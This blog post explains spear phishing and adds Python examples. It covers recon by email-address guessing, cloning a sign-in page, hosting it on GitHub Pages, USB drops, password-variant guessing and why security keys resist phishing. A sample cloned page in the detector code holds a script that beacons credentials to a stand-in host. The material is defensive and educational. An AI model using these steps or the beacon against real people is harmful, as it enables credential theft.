The Anatomy of a Spear Phishing 🐠 Assault

Arcanus 55
Feb 25, 2019


Anyone can be a target by association

Spear phishing is a targeted attack on a specific group of individuals who have access to highly valued information. It typically uses a falsified website, usually a copy of a familiar sign-in page, to trick victims into divulging their user name and password.

You might think that you are not a likely target for spear phishing, but you would be surprised to learn how valuable the information you can access actually is. The documents on your own computer may be trivial; with your password, however, other computers can be reached over your company’s network. Using your credentials, an attacker might access remote servers containing sensitive financial or proprietary information. You do not need to be a C-suite executive to be targeted. You could be a help desk tech, a software tester, or anybody who legitimately has access to the targeted infrastructure.

Imagine, for example, that the hacker wanted access to the data of the fictional XYZ corp. The hacker could probably find many of its employees by first and last name on LinkedIn. From those names, the hacker might guess work email addresses by combining the first initial, last name, and company domain, so John Doe becomes jdoe@xyz.com. The hacker might also append sequential numbers in case there is more than one John Doe employed by XYZ corp (jdoe2@xyz.com, …). Additionally, the certifications listed on your co-workers’ LinkedIn pages can give an attacker tactical intelligence about the type of infrastructure used at XYZ corp, and therefore which vendor’s sign-in page is worth cloning.
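The address-guessing step above is mechanical, so here it is as an added example (my code, not the author’s). It assumes the hypothetical xyz.com domain from the article and a constructed staff list; the four local-part formats are the common corporate conventions an attacker tries first. Defenders can run the same thing against their own directory export to see how guessable their address scheme is.

```python
"""Candidate work-address generation from a public list of names.

Added example, not code from the article. Assumes a hypothetical company
domain and a constructed staff list.
"""
from collections import Counter
import re

# Constructed sample input: names as they might be scraped from public profiles.
EMPLOYEES = ["John Doe", "Jane Roe", "John Doe", "Mary-Ann O'Brien"]
DOMAIN = "xyz.com"  # hypothetical, as in the article

# Local-part formats to try: {f} = first initial, {first}/{last} = names.
FORMATS = ["{f}{last}", "{first}.{last}", "{first}{last}", "{first}_{last}"]


def normalise(name: str) -> tuple[str, str]:
    """Lower-case, drop punctuation (hyphens, apostrophes), return (first, last)."""
    parts = re.sub(r"[^a-z ]", "", name.lower()).split()
    return parts[0], parts[-1]


def candidates(employees, domain, formats=FORMATS):
    """Ordered, de-duplicated candidate addresses for a staff list.

    Where two people normalise to the same local part (two John Does),
    the trick from the article applies: jdoe2, jdoe3, ... are emitted so
    that the later hire's mailbox is covered as well.
    """
    counts = Counter(normalise(n) for n in employees)
    out = []
    for (first, last), count in counts.items():
        for fmt in formats:
            local = fmt.format(f=first[0], first=first, last=last)
            out.append(f"{local}@{domain}")
            # numeric suffixes only for names that actually collide
            out.extend(f"{local}{n}@{domain}" for n in range(2, count + 1))
    return list(dict.fromkeys(out))  # de-duplicate, keep first-seen order


if __name__ == "__main__":
    for addr in candidates(EMPLOYEES, DOMAIN):
        print(addr)
```

The output for the constructed list is sixteen addresses: jdoe@xyz.com and jdoe2@xyz.com (and the same pair in the other three formats) for the two John Does, and one address per format for the other two names.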

The hacker would then need to create a realistic landing page to capture the credentials. Imagine the sign-in page for Google Gmail or Microsoft Outlook. Creating a pixel-perfect copy of one of these pages is surprisingly easy for someone with basic front-end development (FED) skills. Google Chrome can save an entire web page to disk: simply right-click anywhere on the page and select Save As > Webpage, Complete. This writes the HTML and its assets to the local drive and yields a somewhat working copy of the sign-in page. The copy does not need the real site’s back end; it only has to look right for the seconds it takes the victim to type a password. The hacker would then inject some simple JavaScript that asynchronously sends the submitted credentials to a location the hacker controls, perhaps an anonymous and disposable Salesforce developer org reached through a web-to-lead form in an iframe.
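The tell-tale of such a clone is structural: a password form, or a script attached to it, that sends data somewhere other than the brand’s real sign-in host. The following added example (mine, not the author’s) scans a saved sign-in page for exactly that. Both HTML pages are constructed for the example, the hosts attacker-demo.github.io and lead-capture.example.net are hypothetical stand-ins for the GitHub Pages host and the web-to-lead endpoint, and the script path under ssl.gstatic.com is invented for the legitimate-page case.

```python
"""Flag a saved sign-in page whose credential form or scripts post off-brand.

Added example, not from the article. It assumes an allowlist of hosts the
real sign-in page is known to talk to and flags any password-bearing form
whose action, or any URL in a script, resolves to another host.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

URL_RE = re.compile(r"""https?://[^\s'"()]+""")


class SignInPageScanner(HTMLParser):
    """Collects forms (with whether they carry a password field) and script URLs."""

    def __init__(self):
        super().__init__()
        self.forms = []          # dicts: {"action": str, "has_password": bool}
        self.script_urls = []    # src attributes plus URLs found in inline JS
        self._current = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._current is not None:
                self._current["has_password"] = True
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_urls.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands <script> bodies to handle_data verbatim
        if self._in_script:
            self.script_urls.extend(URL_RE.findall(data))


def host_of(url: str, page_host: str) -> str:
    """Host a URL resolves to; relative URLs resolve to the page's own host."""
    return (urlparse(url).netloc or page_host).lower()


def off_brand_targets(html: str, page_host: str, expected_hosts: set) -> set:
    """Return the set of hosts, outside the allowlist, that credentials could reach."""
    scanner = SignInPageScanner()
    scanner.feed(html)
    scanner.close()
    foreign = set()
    for form in scanner.forms:
        if form["has_password"]:
            h = host_of(form["action"], page_host)
            if h not in expected_hosts:
                foreign.add(h)
    for url in scanner.script_urls:
        h = host_of(url, page_host)
        if h not in expected_hosts:
            foreign.add(h)
    return foreign


# Constructed sample: a clone served from a GitHub Pages host, with the
# injected beacon the article describes (endpoint is hypothetical).
CLONED_PAGE = """
<html><body>
<form method="post" action="/signin">
  <input type="email" name="identifier">
  <input type="password" name="password">
  <button>Next</button>
</form>
<script>
  document.forms[0].addEventListener("submit", e => {
    navigator.sendBeacon("https://lead-capture.example.net/webtolead",
                         new FormData(e.target));
  });
</script>
</body></html>
"""

# Constructed sample: the real page posts to, and loads scripts from, known hosts.
LEGIT_PAGE = """
<html><body>
<form method="post" action="https://accounts.google.com/signin">
  <input type="password" name="password">
</form>
<script src="https://ssl.gstatic.com/accounts/app.js"></script>
</body></html>
"""

KNOWN_HOSTS = {"accounts.google.com", "ssl.gstatic.com"}

if __name__ == "__main__":
    print(off_brand_targets(CLONED_PAGE, "attacker-demo.github.io", KNOWN_HOSTS))
    print(off_brand_targets(LEGIT_PAGE, "accounts.google.com", KNOWN_HOSTS))
```

For the clone, two foreign hosts come back: the github.io host itself (the relative form action posts there) and the beacon endpoint in the inline script. For the legitimate page the set is empty. The allowlist matters: real sign-in pages load scripts from several vendor CDNs, so an empty-allowlist scan of a genuine page produces false positives.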

Now, where to host this phony page? GitHub serves Internet-accessible static sites through GitHub Pages (the gh-pages branch of a repository). An advantage here is that these pages are served over HTTPS by default, with no credit card or phone number required. Trying to serve a faux sign-in page over insecure HTTP would be a conspicuous red flag. The padlock, of course, only proves that the connection to the github.io host is encrypted; it says nothing about whether that host is Google.

The only thing left is the email itself. Not my area of expertise, but I have to believe that those written in proper English are more successful. Yes, I am referring to the Nigerian Prince correspondence.

Getting a bogus email past corporate spam filters can be tricky. Time to think outside the in-box (I’m sorry). The hacker might create 100 promotional USB sticks with the XYZ company logo laser-etched on them and load them with PDFs bearing juicy file names like TaxReturns.pdf, CEOProposal.pdf, or [employee name].pdf that lure the reader to the phony sign-in page. Distribute liberally in the bathrooms, cafeterias, and parking lots of the XYZ campus.

Almost half of dropped USB sticks will get plugged in

Why does this method work? It works because people type the same password habitually, without much thought about where and why they are typing it. This is compounded by the fact that people reuse passwords for convenience. The assumption is that if a hacker can acquire your Gmail password, your AD (Active Directory) password is likely to be very similar: similar enough that a short list of variations (a different year, an extra digit or symbol, a capital letter) guesses it successfully.
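To make the “similar enough” claim concrete, here is an added example (my code, not the author’s) that generates the handful of variations an attacker tries first against a known password, and the check a password-change policy should apply in return: reject a new password that is a cheap variant of, or within a couple of edits of, one already known to be compromised. The sample passwords are constructed.

```python
"""Why a leaked password endangers a 'different' one, and the policy check.

Added example, not from the article. The mangling rules are a small subset
of the kind encoded in password-cracker rule files; the suffix list and
leet map are assumptions chosen for illustration.
"""

LEET = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"}
SUFFIXES = ["", "!", "1", "123", "2019", "2020"]


def mangle(base: str) -> set:
    """Variants of `base` that a reuse-aware attacker guesses first."""
    stems = {base, base.lower(), base.capitalize()}
    stems.add("".join(LEET.get(c, c) for c in base.lower()))
    # Bump a trailing number by one: Summer2018 -> Summer2019 (keeps zero padding).
    head = base.rstrip("0123456789")
    tail = base[len(head):]
    if tail:
        stems.add(head + str(int(tail) + 1).zfill(len(tail)))
    return {stem + suffix for stem in stems for suffix in SUFFIXES}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, single-row dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def too_similar(new_pw: str, known_pw: str, max_edits: int = 2) -> bool:
    """Policy check: is new_pw a cheap variant of a known (leaked) password?"""
    if new_pw in mangle(known_pw):
        return True
    return edit_distance(new_pw.lower(), known_pw.lower()) <= max_edits


if __name__ == "__main__":
    leaked = "Summer2018"                      # constructed 'Gmail' password
    for guess in ["Summer2019!", "Summer2O18", "correct horse battery"]:
        print(f"{guess!r}: {'rejected' if too_similar(guess, leaked) else 'ok'}")
```

The first two candidates are exactly what the article predicts for the AD password, a year bump with a symbol and a letter-for-digit swap, and both are rejected; an unrelated passphrase passes. A real policy would run this against a breach corpus rather than a single known password.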

It’s well-established how dangerous spear phishing is and how easily it can reach you. With that in mind, how does one protect oneself?

Use a key. No, not a mechanical key.

The popular options are the Google Titan Security Key and the YubiKey. Both implement FIDO U2F/WebAuthn, in which the browser binds the key’s response to the web origin that requested it: a cloned page on another domain cannot obtain a valid response for the real site. When you use a physical key, a hacker cannot access your account even with your password, provided the account does not fall back to a weaker second factor such as SMS codes.
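The reason the key is not fooled by the clone is worth seeing in code. The following added example (mine, not the author’s, and not a real WebAuthn library) models the three checks that defeat a phishing page: the browser only allows a relying-party ID that matches the page’s origin, the authenticator only answers for an RP ID it has a credential for and binds its signature to that RP ID’s hash, and the relying party refuses any assertion whose recorded origin is not its own. The signature is an HMAC stand-in for the authenticator’s ECDSA signature, an assumption made to stay within the standard library; accounts.example.com and attacker-demo.github.io are hypothetical hosts.

```python
"""Origin binding: why a cloned page cannot reuse a security-key login.

Added example, not from the article. Simplified model of FIDO2/WebAuthn
assertion flow; the HMAC signature is a stand-in for ECDSA.
"""
import hashlib
import hmac
import json
import os
from urllib.parse import urlparse

RP_ID = "accounts.example.com"              # hypothetical relying party
RP_ORIGIN = "https://accounts.example.com"


class Authenticator:
    """Toy security key: one secret per RP ID it was registered with."""

    def __init__(self):
        self._keys = {}

    def register(self, rp_id: str) -> bytes:
        self._keys[rp_id] = os.urandom(32)
        return self._keys[rp_id]            # RP stores this (stand-in for a public key)

    def get_assertion(self, rp_id: str, client_data_hash: bytes):
        """Sign rpIdHash || clientDataHash, as a real authenticator does."""
        if rp_id not in self._keys:
            raise KeyError("no credential for this RP ID")
        auth_data = hashlib.sha256(rp_id.encode()).digest()      # rpIdHash
        sig = hmac.new(self._keys[rp_id], auth_data + client_data_hash, "sha256").digest()
        return auth_data, sig


def rp_verify(cred_key: bytes, challenge: str, client_data: bytes,
              auth_data: bytes, sig: bytes) -> bool:
    """Relying-party checks on an incoming assertion."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != challenge:
        return False                                             # replay / wrong ceremony
    if cd.get("origin") != RP_ORIGIN:
        return False                                             # came from another origin
    if auth_data != hashlib.sha256(RP_ID.encode()).digest():
        return False                                             # signed for another RP ID
    expected = hmac.new(cred_key, auth_data + hashlib.sha256(client_data).digest(),
                        "sha256").digest()
    return hmac.compare_digest(expected, sig)


def attempt(auth: Authenticator, cred_key: bytes, page_origin: str, requested_rp_id: str) -> str:
    """One sign-in attempt from a page at `page_origin`; returns the outcome."""
    challenge = os.urandom(16).hex()                             # fresh per ceremony
    host = urlparse(page_origin).hostname
    # Browser check: RP ID must be the page host or a registrable suffix of it.
    if not (host == requested_rp_id or host.endswith("." + requested_rp_id)):
        return "browser refused rp id"
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": page_origin}, sort_keys=True).encode()
    try:
        auth_data, sig = auth.get_assertion(requested_rp_id, hashlib.sha256(client_data).digest())
    except KeyError:
        return "no credential for this origin"
    return "accepted" if rp_verify(cred_key, challenge, client_data, auth_data, sig) else "rp rejected"


def run_scenarios() -> dict:
    auth = Authenticator()
    cred_key = auth.register(RP_ID)          # enrolment at the real site
    clone = "https://attacker-demo.github.io"
    results = {
        "real site": attempt(auth, cred_key, RP_ORIGIN, RP_ID),
        "clone asks for real rp id": attempt(auth, cred_key, clone, RP_ID),
        "clone uses its own rp id": attempt(auth, cred_key, clone, clone[8:]),
    }
    # Even if the clone had its own credential on the key and relayed that
    # assertion to the real site, the recorded origin gives it away.
    auth.register(clone[8:])
    results["clone relays its own assertion"] = attempt(auth, cred_key, clone, clone[8:])
    return results


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name}: {outcome}")
```

Only the real origin is accepted; the clone is stopped at the browser, then at the key, and finally at the relying party, with the stolen password never entering into it. The check that matters most in practice is the origin comparison in rp_verify: a relying party that skips it has thrown away the phishing resistance the key provides.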

Google recently launched its Advanced Protection Program specifically to help people “likely” to be targets of spear phishing. They name reporters, activists, and politicians as likely targets. That is reasonable, but as we have discussed, the most “likely” targets often do not even know they are valuable targets. Anyone can be a target by association. Stay safe!
